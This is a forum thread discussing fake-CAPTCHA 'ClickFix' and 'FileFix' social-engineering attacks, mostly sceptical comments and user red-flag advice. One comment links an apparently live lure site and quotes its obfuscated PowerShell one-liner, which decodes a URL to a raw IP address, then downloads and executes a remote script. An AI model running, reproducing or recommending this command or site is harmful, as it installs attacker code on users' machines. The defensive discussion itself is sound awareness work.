• moopet@sh.itjust.works
    link
    fedilink
    English
    arrow-up
    4
    ·
    1 day ago

    I don’t understand the language used in this article. It skirts around the details, which are obviously, “tell the user to run a command and hope they do it”, and it talks about a “hardcoded BAT file”. Wat.

  • Onno (VK6FLAB)@lemmy.radio
    link
    fedilink
    English
    arrow-up
    50
    ·
    edit-2
    2 days ago

    This article doesn’t at all explain what actually happens. There’s a hand wavey description including PowerShell scripts and the clipboard, but it doesn’t indicate how the code gets executed.

    The article talks about a complex and sophisticated attack, but I don’t see any evidence of that assertion.

    Also, given that it’s talking about PowerShell, I’m going to guess that this affects Windows only.

    Finally, there’s no source links, no CVE allocation, no indication what the URL looks like.

    I’m going with deep scepticism about this report unless more information comes to hand.

    • SwizzleStick@lemmy.zip
      link
      fedilink
      English
      arrow-up
      32
      ·
      2 days ago

      Yes, they’re glossing over the fact that the user must manually paste and execute code that the fake captcha puts on the clipboard.

      Not a new attack vector in the slightest, just a play on the entry method.

      Anyone doing this should have their computer taken away and head inspected/retrained.

      • sugar_in_your_tea@sh.itjust.works
        link
        fedilink
        English
        arrow-up
        2
        ·
        3 hours ago

        There’s a great way to know what’s in it: paste to a text editor or something. Here are my red flags for this sort of attack, in order:

        1. Asks me to do something outside of the web page, to make the web page work - kind of makes sense for email verification, but that’s about it
        2. Asks me to copy paste something - kind of makes sense for CLI installers or configs for dev tools, but not much else
        3. Uses the Run Command function - nothing good happens with that function, and IMO Microsoft should remove it; power users can open a terminal, it’s not that hard

        Must users should notice at least one of those. If a web page is asking you to do something you don’t understand, don’t do it.

        • lurch (he/him)@sh.itjust.works
          link
          fedilink
          English
          arrow-up
          2
          ·
          3 hours ago

          Yeah, that’s why ClickFix doesn’t work on most users, but still a few. The newer FileFix is nastier, because it looks more plausible in a situation of a download. Like, you know those fake download button ads? Imagine one of those and it leads to instructions to paste something into the native file dialog address bar instead of the run dialog. This will trick a lot more people.

  • Object@sh.itjust.works
    link
    fedilink
    English
    arrow-up
    9
    arrow-down
    1
    ·
    edit-2
    2 days ago

    For those who want to see it in action:

    https://dex-redirect.com/

    It gives you the following script:

    powershell -NoExit -c “$znn=‘sggk://91.212.166.104/e/2e’;$djq=$znn.ToCharArray()|%{if($_ -cmatch ‘[a-z]’){[char](122 - ([int][char]$_ - 97))}else{$_}};$jgq=($djq -join ‘’);([ScriptBlock]::Create((Invoke-RestMethod $jgq))).Invoke();”

    I can’t check what the CAPTCHA prompt says since I’m on mobile, but I’m guessing it asks you to paste it into your console.